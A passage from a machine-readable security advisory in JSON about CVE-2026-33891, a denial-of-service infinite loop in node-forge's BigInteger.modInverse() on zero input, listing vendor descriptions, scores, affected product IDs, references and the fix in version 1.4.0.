                    "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33891"
                },
                {
                    "category": "description",
                    "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33891.json"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in the node-forge library, a JavaScript implementation of Transport Layer Security. This vulnerability, inherited from the bundled jsbn library, allows a remote attacker to cause a Denial of Service (DoS). When the BigInteger.modInverse() function is called with a zero value, it enters an infinite loop, causing the process to hang indefinitely and consume 100% of the CPU resources.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33891.json"
                },
                {
                    "category": "description",
                    "text": "Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input",
                    "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "other",
                    "text": "0.0004",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.0",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product_remediation data available from source Redhat",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5920253",
                    "CSAFPID-5956281",
                    "CSAFPID-1439292",
                    "CSAFPID-1439294",
                    "CSAFPID-1439306",
                    "CSAFPID-1439317",
                    "CSAFPID-1439319",
                    "CSAFPID-1441200",
                    "CSAFPID-1455906",
                    "CSAFPID-1459353",
                    "CSAFPID-1459355",
                    "CSAFPID-1496261",
                    "CSAFPID-1508257",
                    "CSAFPID-1771999",
                    "CSAFPID-1837472",
                    "CSAFPID-1837473",
                    "CSAFPID-2109952",
                    "CSAFPID-2109953",
                    "CSAFPID-2467441",
                    "CSAFPID-2467442",
                    "CSAFPID-2467443",
                    "CSAFPID-2467444",
                    "CSAFPID-2467445",
                    "CSAFPID-2467448",
                    "CSAFPID-2552001",
                    "CSAFPID-2698055",
                    "CSAFPID-2698057",
                    "CSAFPID-2855724",
                    "CSAFPID-2855725",
                    "CSAFPID-2858634",
                    "CSAFPID-2868420",
                    "CSAFPID-2914696",
                    "CSAFPID-2914697",
                    "CSAFPID-5187689",
                    "CSAFPID-5222698",
                    "CSAFPID-5940623",
                    "CSAFPID-5940626",
                    "CSAFPID-5940629",
                    "CSAFPID-5197899",
                    "CSAFPID-5733329"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-5m6q-g25r-mvwx"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-5m6q-g25r-mvwx.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33891"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33891.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33891.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - microsoft",
                    "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-5m6q-g25r-mvwx"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-33891"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
                    "product_ids": [
                        "CSAFPID-1439292",
                        "CSAFPID-1439294",
                        "CSAFPID-1439306",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1459353",
                        "CSAFPID-1459355",
                        "CSAFPID-1496261",
                        "CSAFPID-1508257",
                        "CSAFPID-1771999",
                        "CSAFPID-1837472",
                        "CSAFPID-1837473",
                        "CSAFPID-2109952",
                        "CSAFPID-2109953",
                        "CSAFPID-2467441",
                        "CSAFPID-2467442",
                        "CSAFPID-2467443",
                        "CSAFPID-2467444",
                        "CSAFPID-2467445",
                        "CSAFPID-2467448",
                        "CSAFPID-2552001",
                        "CSAFPID-2698055",
                        "CSAFPID-2698057",
                        "CSAFPID-2855724",
                        "CSAFPID-2855725",
                        "CSAFPID-2858634",
                        "CSAFPID-2868420",
                        "CSAFPID-2914696",
                        "CSAFPID-2914697",
                        "CSAFPID-5187689",
                        "CSAFPID-5222698",
                        "CSAFPID-5940623",
                        "CSAFPID-5940626",
                        "CSAFPID-5940629"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                        "baseScore": 7.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1439292",
                        "CSAFPID-1439294",
                        "CSAFPID-1439306",
                        "CSAFPID-1439317",
                        "CSAFPID-1439319",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1459353",
                        "CSAFPID-1459355",
                        "CSAFPID-1496261",
                        "CSAFPID-1508257",
                        "CSAFPID-1771999",
                        "CSAFPID-1837472",
                        "CSAFPID-1837473",
                        "CSAFPID-2109952",
                        "CSAFPID-2109953",
                        "CSAFPID-2467441",
                        "CSAFPID-2467442",
                        "CSAFPID-2467443",
                        "CSAFPID-2467444",
                        "CSAFPID-2467445",
                        "CSAFPID-2467448",
                        "CSAFPID-2552001",
                        "CSAFPID-2698055",
                        "CSAFPID-2698057",
                        "CSAFPID-2855724",
                        "CSAFPID-2855725",
                        "CSAFPID-2858634",
                        "CSAFPID-2868420",
                        "CSAFPID-2914696",
                        "CSAFPID-2914697",
                        "CSAFPID-5187689",
                        "CSAFPID-5197899",
                        "CSAFPID-5222698",
                        "CSAFPID-5733329",
                        "CSAFPID-5920253",
                        "CSAFPID-5940623",
                        "CSAFPID-5940626",
                        "CSAFPID-5940629",
                        "CSAFPID-5956281"
                    ]
                }
            ],
            "title": "CVE-2026-33891"
        }
    ]
}